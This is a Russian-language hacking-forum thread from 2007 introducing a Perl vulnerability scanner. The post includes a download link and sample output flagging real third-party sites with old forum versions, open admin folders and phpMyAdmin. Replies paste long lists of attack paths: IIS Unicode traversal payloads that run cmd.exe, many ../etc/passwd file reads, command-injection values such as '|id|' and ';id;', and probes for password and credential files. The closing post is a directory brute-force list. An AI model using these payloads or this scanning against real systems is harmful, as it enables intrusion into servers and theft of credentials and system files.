Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.02.2007, 16:50
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Kiborg scaner 0.5
Представляю вам свой сканер...Написан на perl. Не мог придумать как его назвать и назвал просто kiborg scaner v0.5.
Чисто движок сканера, может прогнать сайт по базе уязвимостей scan.ini. В сканере есть еще модули, эти модули позволяют получить список сайтов для сканера. Seotols и domainsdb передадут сканеру массив с соседними сайтами данного сайта, yandex,yahoo,google передадут сканеру сайты, под заданный поисковый запрос. Отличительной особенностью сканера является ,то что к верному результату можно применить свою функцию. Например указали в базе по каким критериям ему определять phpbb форум, а в print файла scan.ini пишем {любая функция} и к phpbb применится ваша функция.
Без модуля, сканер прогонит только ваш сайт через базу уязвимостей. Сканер не тратит время на проверку убитых сайтов.
Подробная интрукция вызывается -h1 в сканере или чтением docs/readme.htm
Вот пример его работы:
E:\scaner>kiborg.pl - t exelab.org -m seologs
Target is: exelab.org
Count of sites is: 54
Start number of sites is: 0
1:phpbb: [http://ad-host.org/forum/] [version : 2.0.21] [cookie : NO] [highlight : NO]
3:vbulletin: [http://aleksdesign.org/forum/] [version : 3.5.1] [upgrade_300b3.php : no] [validator : no]
5:dir: [http://billing.x5x.ru/admin/] [200]
10:dir: [http://elise.landgraph.ru/admin/] [200]
13:vbulletin: [http://forum.aleksdesign.org/] [version : 3.5.1] [upgrade_300b3.php : no] [validator : no]
15:phpbb: [http://forum.kvest.info/] [version : 2.0.21] [cookie : NO] [highlight : NO]
17:vbulletin: [http://forum.x5x.ru/] [version : 3.5.3] [upgrade_300b3.php : no][validator : no]
21:phpinfo: [http://intname.info/test.php] [200]
21:phpbb: [http://intname.info/forum/] [version : 2.0.21] [cookie : NO] [highlight : NO]
22:phpinfo: [http://intname.org/test.php] [200]
22:phpmyadmin: [http://intname.org/myadmin/] [password : yes]
................................
Респект и уважуха KSURi и 1ten0.0net1 за тестировани скрипта.
Если вы хотите прислать свой модуль для сканера или пополнить базу уязвимостей, или абматюгать автора, стучитесь в асику 768620.
Общие вопросы задавайте на форуме, буду отвечать.
Скачать: http://rapidshare.com/files/260295494/1160_scaner.zip.html
Последний раз редактировалось k1b0rg; 26.07.2009 в 21:04..
|
|
|
22.02.2007, 22:20
|
|
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072
Репутация:
362
|
|
Замечательная шняга!
Респет тебе, киби.
ИМХО, в избранное
|
|
|
|
22.02.2007, 22:29
|
|
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
Провел на форуме:
3811682
Репутация:
641
|
|
k1b0rg тебе в колекцию =)
Код:
admisapi/fpadmin.htm
/piranha/secure/passwd.php3
/cgi-bin/bizdb1-search.cgi
/cgi-bin/webplus?script=/script_dir/store.wml
/cgi-bin/webplus
/cgi-bin/webplus?script=/../../../../etc/passwd
/cgi-bin/webplus?about
/mlog.html?screen=/etc/passwd
/mlog.html
/bin/test.txt
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/bbs_forum.cgi
/cgi/commerce.cgi
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/cgi-bin/pals-cgi
/isapi/tstisapi.dll
/ROADS/cgi-bin/search.pl
/cgi-bin/sendtemp.pl
/way-board/way-board.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/webspirs.cgi
/cgi-bin/auktion.pl
/ext.dll
/cgi-bin/suche/hsx.cgi
/cgi-bin/mailnews.cgi
/cgi-bin/empower
/cgi-bin/webdriver
/technote/technote/print.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/form-totaller/form-totaller.cgi
/cgi-bin/mailview.cgi
/cgi-bin/wrap
/cgi-bin/db2www/library/document.d2w/show
Нашел в глуби своих архивов....
|
|
|
|
22.02.2007, 22:43
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Вот крупная база:
Код:
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/scripts/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir
/cgi/..%c0%af../..%c0%af../..%c0%af../win2000/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255cwin2000/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255cwin2000/system32/cmd.exe?/c+dir
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/..%255c..%255c..%255c..%255cwin2000/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255cwin2000/system32/cmd.exe?/c+dir
/cgi/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/cgi/..%255c..%255c..%255c..%255cwin2000/system32/cmd.exe?/c+dir
/_vti_bin/shtml.dll/demon.html
/null.htw
/scripts/UploadExt.dll
/scripts/cpshost.dll
/../../../../../../scandisk.log
/.../.../.../.../.../.../scandisk.log
/pbserver/pbserver.dll
/."./."./."./."./."./."./winnt/win.ini%20.php3
/scripts/iisadmin/ism.dll
/iisadmpwd/aexp4.htr
/iisadmin/iis.asp
/msadc/Samples/Selector/Client/IE/adcauto.asp
/iissamples/sdk/asp/interaction/ServerVariables_Jscript.asp
/scripts/tools/mkilog.exe
/_vti_bin/_vti_aut/dvwssr.dll
/scripts/tools/newdsn.exe
/....../autoexec.bat
/..../autoexec.bat
/_vti_bin/shtml.dll/_vti_rpc
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/_vti_pvt/access.cnf
/_vti_pvt/service.cnf
/_vti_pvt/services.cnf
/_vti_pvt/services.org
/_vti_pvt/writeto.cnf
/_vti_pvt/structure.cnf
/_vti_pvt/linkinfo.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/service.pwd
/_vti_pvt/service.grp
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_log/author.log
/_vti_pvt/administrators.pwd
/_private/form_results.txt
/_private/orders.txt
/_private/register.txt
/_private/registrations.txt
/_private/form_results.htm
/_private/orders.htm
/_private/register.htm
/_private/registrations.htm
/cgi-bin/ws_ftp.ini
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/admintool.asp
/admintool.aspx
/cgi-bin/admintool.asp
/cgi-bin/admintool.aspx
/scripts/admintool.asp
/scripts/admintool.aspx
/cgi-bin/.htaccess
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess~
/usr/adm/wtmp/
/usr/adm/wtmp
/usr/adm/
/ncl_items.html
/GetFile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\win.ini
/manage/cgi/cgiproc
/mlog.html
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/mylog.html
/names.nsf
/ows-bin/*.bat
/perl/files.pl
/perl
/srchadm
/scripts/
/cgi-bin/
/cgi_bin/
/cgibin/
/cgi/
/bin/
/inc/
/include/
/msadc/
/logs/
/log/
/root/
/wwwroot/
/samples/
/user/
/users/
/usage/
/adm/
/admin/
/etc/
/pub/
/public/
/var/
/upload/
/client/
/clients/
/order/
/orders/
/source/
/sources/
/remote/
/address/
/access/
/get/
/read/
/view/
/save/
/setup/
/security/
/db/
/default/
/database/
/pass/
/passwd/
/password/
/passwords/
/global/
/login/
/logins/
/alias/
/aliases/
/beta/
/test/
/test12/
/info/
/ini/
/doc/
/docs/
/code/
/codes/
/email/
/emails/
/group/
/groups/
/key/
/keys/
/mail/
/mails/
/ip/
/host/
/hosts/
/service/
/services/
/phone/
/phones/
/write/
/forwrite/
/sys/
/sysadmin/
/system/
/system32/
/img/
/images/
/iisadmin/
/iissamples/
/iisadmpwd/
/scripts/iisadmin/
/_private/
/_vti_bin/
/_vti_bin/_vti_adm/
/_vti_pvt/
/_vti_log/
/_vti_txt/
/_vti_cnf/
/scripts/abracadabra.bat
/scripts/abracadabra.cmd
/scripts/c32web.exe
/scripts/dbman/db.cgi
/scripts/proxy/w3proxy.dll
/scripts/no-such-file.pl
/scripts/perl?
/scripts/rb.dll
/scripts/cgimail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/fpcount.exe
/scripts/Fpadmcgi.exe
/scripts/CGImail.exe
/scripts/repost.asp
/scripts/pu3.pl
/scripts/pu3.cgi
/scripts/pu3
/scripts/slxweb.dll
/scripts/wsisa.dll
/scripts/webbbs.exe
/scripts/../../cmd.exe?%2FC+echo+\'hacked!'\'>c:\\hello.bat
/database.nsf/
/chat/passwd.txt
/chat/password.txt
/chat/passwords.txt
/chat/passwd.cgi
/forum/passwd.txt
/forum/passwords.txt
/forums/passwd.txt
/aux
/domcfg/
/secure/.htaccess
/security/.htaccess
/scripts/submit.cgi
/chat/passwd.pl
/chat/passwd.txt
/wforum/passwd.txt
/wboard/passwd.txt
/uploads/patch.exe
/quikstore.cfg
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pw/storemgr.pw
/status
/secure/htaccess/
/secure/.htaccess/
/officescan/cgi/jdkRqNotify.exe
/officescan/cgi/
/officescan/
/ASPSamp/
/tools/newdsn.exe
/scripts/isapi/srch.htm
/log.nsf
/webcart/
/today.nsf
/log/
/catalog.nsf
/orders/import.txt
/config/import.txt
/admisapi/fpadmin.htm
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/global.asa+.htr
/global.asa%3F+.htr
/global.asa
/tsweb/default.htm
/tsweb/connect.asp
/wsa/site_area.asp
/sh_taskframes.asp
/disk/disk_prop.asp
/fpadmdll.dll
/iishelp/iis/misc/default.asp
/msadc/Samples/Selector/showcode.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/scripts/iisadmin/bdir.htr
/xxx.idc
/a%5c.aspx
/cgi-bin/htimage.exe?1,1
/scripts/htimage.exe?1,1
/_vti_bin/shtml.dll/xxx.html
/_vti_bin/shtml.dll/xxx.html
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/shtml.dll/_vti_rpc
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../../../../../etc/passwd
/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/udirectory.pl?MAIN_FIELD=blah&command=add_new_listing&category_file=/../../../../../../../bin/ping
/robot.txt
/robots.txt
/passwd
/passwd.txt
/wwwboard/passwd.txt
/webboard/passwd.txt
/password
/.../
/servlet/com.unify.ewave.servletexec.UploadServlet
/....
/scripts/postings.cgi
/cgi/postings.cgi
/cgi-bin/postings.cgi
/cgi-bin/ikonboard/help.cgi
/admin.php3?admin=whatever
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
/websrc/cvsweb.cgi
/pccsmysqladm/incs/dbconnect.inc
/bin/common/user_update_passwd.pl
/bin/common/user_update_admin.pl
/bin/create_user_account.pl
/opt/netscape/suitespot/admin-serv/config/admpw
/admin-serv/config/admpw
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/../config/html/cnf_gi.htm
/docs
/~root
/~root/etc/passwd
/etc/passwd
/../../../../../../../../../../etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin/guestbook.cgi
/cgi-bin/campas
/graphics/sml3com
/adsl_pair_select
/adsl_reset
/ads/adpassword.txt
/cgi-bin/adpassword.txt
/cgi-bin/ads/adpassword.txt
/cgi-bin/pagelog.cgi
/cgi-bin/page-og.cgi
/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/ceilidh.exe
/cgi-bin/ceilidh.exe/ceilidh/?N4
/cgi-bin/formmail.cgi?env_report=/etc/passwd&recipient=crazy_einstein@yahoo.com&required=&firstname=&lastname=&email=&message=&Sbmit=hi
/random_banner/index.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls -la|
/something.php3
/cgi-bin/wais.pl
/wais.pl
/cgi-bin/news/news.cgi
/cgi-bin/whois.cgi
/cgi-bin/whois.cgi?host=|id|
/cgi-bin/webmail.cgi
/cgi-bin/webmail.cgi?subject=;id;&send_to=&response_url=/
/cgi-bin/finger.cgi
/cgi-bin/finger.cgi?host=|id|
/cgi-bin/lookup.cgi?lookup=|id|
/cgi-bin/lookup.cgi
/cgi-bin/ping.cgi?host=|id|
/cgi-bin/ping.cgi
/cgi-bin/finger.pl
/cgi-bin/finger.pl?ADDR=|id|
/cgi-bin/traceroute.cgi?host=|id|
/cgi-bin/traceroute.cgi
/htdocs/_vti_pvt/service.pwd
/cgi/cgiproc
/onlineor.htm
/~wsapi/cfusion
/cgi-bin/cached_feed.cgi
/cgi-bin/webdata_test.pl
/mailfile.cgi
/cgi-bin/lmail.pl
/cgi-bin/formnow.cgi
/cgi-bin/maillist.cgi
/cgi-bin/click.pl
/cgi-bin/htgrep/htgrep.cgi
/cgi-bin/htgrep
/ap_afodpdemo.shtml
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
/cgi-bin/mailmachine.cgi
/cgi-bin/stats.cgi
/cgi-bin/amlite/amadmin.pl
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/resolv.conf%00.html&passurl=
/category/
/.html/.............
/.html/............./config.sys
/config.sys
/s%65cure
/admcgi/contents.htm
/admcgi/
/admin.php3
/aux/
/formmail.cgi
/nonexistant.pl
/domlog.nsf
/bin/admin.pl
/bin/cfgwiz.exe
/bin/contents.htm
/bin/fpadmin.htm
/bin/fpremadm.exe
/bin/fpsrvadm.exe
/bin/scripts/Fpadmcgi.exe
/phpPhotoAlbum/explorer.php
/allmanage.pl
/allmanage.cgi
/allmanageup.pl
/admintool.pl
/admintool.cgi
/cgi-bin/admintool.pl
/cgi-bin/admintool.cgi
/scripts/admintool.pl
/scripts/admintool.cgi
/allmanageup.cgi
/CFIDE/Administrator/startstop.html
/everythingform.cgi
/form-totaller/form-totaller.cgi
/cgi-bin/.htaccess
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess~
/cgi-bin/.wwwacl
/cgi-bin/post_query
/cgi-bin/post_query.pl
/cgi-bin/nph-error.pl
/cgi-bin/nph-error.cgi
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist
/cgi-bin/cartmanager.cgi
/cgi-bin/Admin_files/
/cgi-bin/dbmlparser.exe
/cgi-bin/rpm_query
/cgi-bin/cachemgr.cgi
/cgi-bin/af.cgi
/cgi-bin/ax.cgi
/cgi-bin/archive
/cgi-bin/archive.cgi
/cgi-bin/archive.pl
/cgi-bin/Iwgate
/cgi-bin/Iwgate.cgi
/cgi-bin/Iwgate.pl
/cgi-bin/postcards.cgi
/cgi-bin/cardboard.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/nlog-smb.cgi
/cgi-bin/webmap.cgi
/cgi-bin/webmap.pl
/cgi-bin/nlog-smb.pl
/cgi-bin/nlog-smb
/cgi-bin/redir.exe
/cgi-bin/aglimpse
/cgi-bin/w3-msql
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.cgi
/cgi-bin/bnbsurvey.cgi
/cgi-bin/AnyForm2
/cgi-bin/MachineInfo
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/dnewsweb
/cgi-bin/bnbform.cgi
/cgi-bin/icat
/cgi-bin/AnyForm
/cgi-bin/bb-hostsvc.sh
/cgi-bin/counterfiglet
/cgi-bin/counter-ord
/cgi-bin/counterfiglet-ord
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/netauth.cgi
/cgi-bin/dig.cgi
/cgi-bin/get16.exe
/cgi-bin/get32.exe
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/cgiwrap
/cgi-bin/formmail.cgi
/cgi-bin/site_ftp.pl
/cgi-bin/stats.prg
/cgi-bin/change-your-password.pl~
/cgi-bin/classifieds.cgi
/cgi-bin/count.cgi
/cgi-bin/icat.pl
/cgi-bin/robpoll.cgi
/cgi-bin/webmap
/cgi-bin/db_manager.cgi
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/cgi-lib.pl
/cgi-bin/visitor.exe
/cgi-bin/ppdscgi.cgi
/cgi-bin/edit.pl
/cgi-bin/htmldocs
/cgi-bin/log
/cgi-bin/ppdscgi.exe
/cgi-bin/pfdispaly.cgi
/cgi-bin/multihtml.pl
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/ddrint/bin/ddicgi.exe
/siteman000510/siteman.php3
/cgi-bin/mailview.cgi
/cgi-bin/mailform.exe
/cgi-bin/mlog.phtml
/cgi-bin/mlog.shtml
/cgi-bin/mlog.htm
/cgi-bin/LWGate
/cgi-bin/icat.cgi
/cgi-bin/lister
/cgi-bin/LWGate.cgi
/cgi-bin/LWGate.pl
/cgi-bin/logs
/cgi-bin/post_query.cgi
/cgi-bin/logs.cgi
/cgi-bin/environ.cgi
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/flexform.cgi
/cgi-bin/flexform.pl
/cgi-bin/form.pl
/cgi-bin/finger
/cgi-bin/finger?@localhost
/cgi-bin/form.cgi
/cgi-bin/formmail.pl
/cgi-bin/statsconfig
/cgi-bin/excite
/cgi-bin/minimal.exe
/cgi-bin/fpexplore.exe
/cgi-bin/get32.exe
/cgi-bin/gH.cgi
/cgi-bin/login.cgi
/cgi-bin/wrap
/cgi-bin/axs.cgi
/cgi-bin/webbbs.cgi
/cgi-bin/AnyBoard.cgi
/cgi-bin/env.cgi
/cgi-bin/cgiwrap
/cgi-bin/files.pl
/cgi-bin/glimpse
/cgi-bin/guestbook.pl
/cgi-bin/guestbook.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/getdoc.cgi
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/info2www
/cgi-bin/logs.pl
/cgi-bin/bigconf.cgi
/cgi-bin/news.cgi
/cgi-bin/bigconf.pl
/cgi-bin/infosrch.cgi
/cgi-bin/jj
/cgi-bin/loadpage.cgi
/cgi-bin/mailit.pl
/cgi-bin/maillist.pl
/cgi-bin/subscribe.pl
/cgi-bin/man.sh
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/perl.exe
/cgi-bin/YaBB.pl
/cgi-bin/perlshop.cgi
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/php
/cgi-bin/php.cgi
/cgi-bin/php-cgi
/cgi-bin/plusmail
/cgi-bin/query
/cgi-bin/responder.cgi
/cgi-bin/rguest.exe
/cgi-bin/rwwwshell.pl
/cgi-bin/search.cgi
/cgi-bin/sendform.cgi
/cgi-bin/sojourn.cgi
/cgi-bin/survey.cgi
/cgi-bin/test.bat
/cgi-bin/test.cgi
/cgi-bin/textcounter.pl
/cgi-bin/tigvote.cgi
/cgi-bin/input/
/cgi-bin/add_ftp.cgi
/cgi-bin/add_ftp.pl
/cgi-bin/ftp
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/upload.pl
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
/cgi-bin/view-source
/cgi-bin/shopper.cgi
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/webdist.cgi
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webutil.pl
/cgi-bin/webutils.pl
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/webwho.pl
/cgi-bin/imagemap.exe
/cgi-bin/wguest.exe
/cgi-bin/sawmill
/cgi-bin/whois_raw.cgi
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/cgi-bin/wrap.cgi
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/post16.exe
/cgi-bin/aliredir.exe
/cgi-bin/imapncsa.exe
/cgi-bin/imapcern.exe
/cgi-bin/lsin.exe
/cgi-bin/profile.cgi
/cgi-dos/uploads/patch.exe
/cgi-dos/patch.exe
/cgi-dos/args.cmd
/cgi-shl/win-c-sample.exe
/cgi-win/uploader.exe
/cgi-bin/ftp/ftp.pl
/cgi/amadmin.pl
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/bulk/bulk.cgi
/cgi-bin/cbmc/forums.cgi
/cgi-auth/userreg.cgi
/cgi-bin/webplus.cgi
/cgibin/htgrep
/OvCgi/OpenView5.exe
/com1
/com2
/com3
/config/html/cnf_gi.htm
/domcfg.nsf/?open
/domcfg.nsf
/etc
/etc/passwd.shadow
/etc/passwd.shad
/etc/security/passwd
/etc/security
/etc/secure
/tcb/files/auth
/etc/master.passwd
/etc/shadpw
/lpt
/.security/etc/passwd
/.secure/etc/passwd
/etc/passwd[.dir|.pag]
/etc/security/passwd.adjunct
/etc/udb
/etc/security/*database
/etc/security/*dat
/bin/sh
/bin/sh/
/etc/auth[.dir|.pag]
/usr/adm/lastlog
/etc/utmp
/usr/adm/wtmp/
/usr/adm/wtmp
/usr/adm/
/ncl_items.html
/manage/cgi/cgiproc
/mlog.html
/mylog.html
/names.nsf
/perl/files.pl
/perl
/srchadm
/scripts/
/cgi-bin/
/cgi_bin/
/cgibin/
/cgi/
/bin/
/inc/
/include/
/msadc/
/logs/
/log/
/root/
/wwwroot/
/samples/
/user/
/users/
/usage/
/adm/
/admin/
/etc/
/pub/
/public/
/var/
/upload/
/client/
/clients/
/order/
/orders/
/source/
/sources/
/remote/
/address/
/access/
/get/
/read/
/view/
/save/
/setup/
/security/
/db/
/default/
/database/
/pass/
/passwd/
/password/
/passwords/
/global/
/login/
/logins/
/alias/
/aliases/
/beta/
/test/
/test12/
/info/
/ini/
/doc/
/docs/
/code/
/codes/
/email/
/emails/
/group/
/groups/
/key/
/keys/
/mail/
/mails/
/ip/
/host/
/hosts/
/service/
/services/
/phone/
/phones/
/write/
/forwrite/
/sys/
/sysadmin/
/system/
/system32/
/img/
/images/
/iisadmin/
/iissamples/
/iisadmpwd/
/scripts/iisadmin/
/_private/
/_vti_bin/
/_vti_bin/_vti_adm/
/_vti_pvt/
/_vti_log/
/_vti_txt/
/_vti_cnf/
/scripts/dbman/db.cgi
/scripts/no-such-file.pl
/scripts/perl?
/scripts/cgimail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/fpcount.exe
/scripts/Fpadmcgi.exe
/scripts/CGImail.exe
/scripts/pu3.pl
/scripts/pu3.cgi
/scripts/pu3
/scripts/webbbs.exe
/search97.vts
/search
/secure/htaccess
/secure/.wwwacl
/security/.wwwacl
/seach.vts
/bin
/getdrvrs.exe
/server%20logfile
/session/adminlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/ss.cfg
/html/
/adminlogin?RCpage=/sysadmin/index.stm
/tools/newdsn.exe
/WCB/databases/instructors.passwd
/WCB/databases/users.passwd
/web/bb-hist.sh
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/templates/cc.txt
/webboard/passwd.txt
/webboard/password.txt
/webboard/passwd
/webboard/password
/users/scripts/submit.cgi
/perl/perl.exe
/con
/database.nsf/
/chat/passwd.txt
/chat/password.txt
/chat/passwords.txt
/chat/passwd.cgi
/forum/passwd.txt
/forum/passwords.txt
/forums/passwd.txt
/aux
/domcfg/
/secure/.htaccess
/security/.htaccess
/scripts/submit.cgi
/chat/passwd.pl
/chat/passwd.txt
/wforum/passwd.txt
/wboard/passwd.txt
/uploads/patch.exe
/quikstore.cfg
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pw/storemgr.pw
/status
/secure/htaccess/
/secure/.htaccess/
/officescan/cgi/jdkRqNotify.exe
/officescan/cgi/
/officescan/
/ASPSamp/
/tools/newdsn.exe
/scripts/isapi/srch.htm
/log.nsf
/webcart/
/today.nsf
/log/
/catalog.nsf
/orders/import.txt
/config/import.txt
/admisapi/fpadmin.htm
/piranha/secure/passwd.php3
/cgi-bin/bizdb1-search.cgi
/cgi-bin/webplus?script=/script_dir/store.wml
/cgi-bin/webplus
/cgi-bin/webplus?script=/../../../../etc/passwd
/cgi-bin/webplus?about
/mlog.html?screen=/etc/passwd
/mlog.html
/bin/test.txt
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/bbs_forum.cgi
/cgi/commerce.cgi
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report
/cgi-bin/pals-cgi
/ROADS/cgi-bin/search.pl
/cgi-bin/sendtemp.pl
/way-board/way-board.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/webspirs.cgi
/cgi-bin/auktion.pl
/cgi-bin/suche/hsx.cgi
/cgi-bin/mailnews.cgi
/cgi-bin/empower
/cgi-bin/webdriver
/technote/technote/print.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/form-totaller/form-totaller.cgi
/cgi-bin/mailview.cgi
/cgi-bin/wrap
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/forums/list.php
/~ftp
/~nobody/etc
/ultraboard.pl
|
|
|
|
22.02.2007, 22:44
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Поиск дирректорий:
Код:
/
/a/
/aaa/
/about/
/academia/
/acart/
/access/
/account/
/achievo/
/address/
/ads/
/adm/
/admin/
/administration/
/admins/
/admintool/
/admintools/
/AdminWeb/
/alias/
/aliases/
/allow/
/alpha/
/apache/
/application/
/applications/
/arc/
/archive/
/archives/
/article/
/articles/
/audit/
/auth/
/b/
/backup/
/bank/
/beta/
/billpay/
/bin/
/boardroom/
/boot/
/build/
/c/
/cache/
/card/
/cards/
/cash/
/catalog/
/cbi-bin/
/cdrom/
/CertControl/
/CertEnroll/
/certsrv/
/cgi/
/cgi-auth/
/cgi-bin/
/cgi-bin2/
/cgi_bin/
/cgi-csc/
/cgi-lib/
/cgi-local/
/cgi-scripts/
/cgi-shl/
/cgi-shop/
/cgi-src/
/cgi-sys/
/cgi-temp/
/cgi-win/
/cgibin/
/chat/
/check/
/citrix/
/class/
/classes/
/client/
/clients/
/closeup/
/cookie/
/code/
/codes/
/component/
/components/
/conf/
/config/
/connect/
/console/
/control/
/css/
/CS/
/cvsweb/
/CVS/
/cybercash/
/d/
/daemon/
/dat/
/data/
/database/
/databases/
/db/
/default/
/demo/
/deny/
/development/
/dir/
/directory/
/dirs/
/disk/
/disks/
/distr/
/distrib/
/DMR/
/doc/
/doc-html/
/docs/
/document/
/documents/
/down/
/download/
/downloads/
/e/
/email/
/emails/
/error/
/errors/
/etc/
/example/
/examples/
/exe/
/f/
/field/
/file/
/files/
/films/
/find/
/forum/
/forums/
/forwrite/
